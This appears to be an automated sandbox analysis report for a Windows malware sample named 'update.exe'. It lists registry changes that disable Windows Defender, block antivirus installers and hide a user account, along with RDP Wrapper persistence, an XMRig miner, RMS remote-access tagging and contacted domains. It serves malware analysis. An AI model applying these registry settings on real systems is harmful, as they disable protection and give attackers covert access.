memory/2008-13-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-12-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-11-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-10-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-9-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-8-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-7-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-6-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-5-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-4-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-3-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-2-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/2008-15-0x00000000038A0000-0x00000000038DA000-memory.dmp

memory/2008-16-0x00000000022A0000-0x00000000022A2000-memory.dmp

memory/3892-49-0x000001F87B3A0000-0x000001F87B3A1000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\update.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" C:\Programdata\RealtekHD\taskhost.exe N/A

RMS

trojan rat rms

Rms family

rms

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\regedit.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

xmrig

miner xmrig

Grants admin privileges

Remote Service Session Hijacking: RDP Hijacking

lateral_movement
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\net1.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Server Software Component: Terminal Services DLL

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" C:\rdp\RDPWInst.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Stops running service(s)

evasion execution

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\R8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\programdata\install\cheat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation C:\ProgramData\Microsoft\Intel\taskhost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\System32\svchost.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" C:\Programdata\RealtekHD\taskhostw.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Modifies WinLogon

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" C:\rdp\RDPWInst.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Password Policy Discovery

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\rutserv.pdb C:\ProgramData\Windows\rutserv.exe N/A
File opened for modification C:\Windows\SysWOW64\exe\rutserv.pdb C:\ProgramData\Windows\rutserv.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\exe\rutserv.pdb C:\ProgramData\Windows\rutserv.exe N/A
File created C:\Windows\System32\rfxvmt.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Windows\System32\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhost.exe N/A
File opened for modification C:\Windows\System32\winmgmts:\localhost\ C:\Programdata\RealtekHD\taskhost.exe N/A

Hide Artifacts: Hidden Users

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" C:\Windows\SysWOW64\regedit.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" C:\Windows\SysWOW64\reg.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\360 C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\COMODO C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\AVG C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files\RDP Wrapper C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\rdp\RDPWInst.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\ESET C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\Users\Admin\AppData\Local\Temp\update.exe N/A
File opened for modification C:\Program Files\Cezurity C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\attrib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Microsoft\Intel\taskhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\icacls.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
